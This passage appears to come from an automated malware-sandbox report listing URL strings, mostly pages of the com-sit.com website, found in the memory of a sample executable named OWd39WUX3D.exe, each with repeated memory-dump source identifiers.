00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/#/schema/logo/image/
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/#breadcrumb
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/#organization
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/#primaryimage
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/#website
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/?s=
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/administration/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/agb/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/asien/
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/branchen-know-how/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/central-warehouse-seite/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/central-warehouse/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/code-of-conducts/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/comments/feed/
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/comsit-blog/
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/consigment-pakete/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/consignment/
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/content-supply-management/
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/datenschutz/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/decapsulating/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/direktvermarktung/
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/diversity-unternehmensethik-comsit/
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/en/start-english/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/europa/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/feed/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/hr/
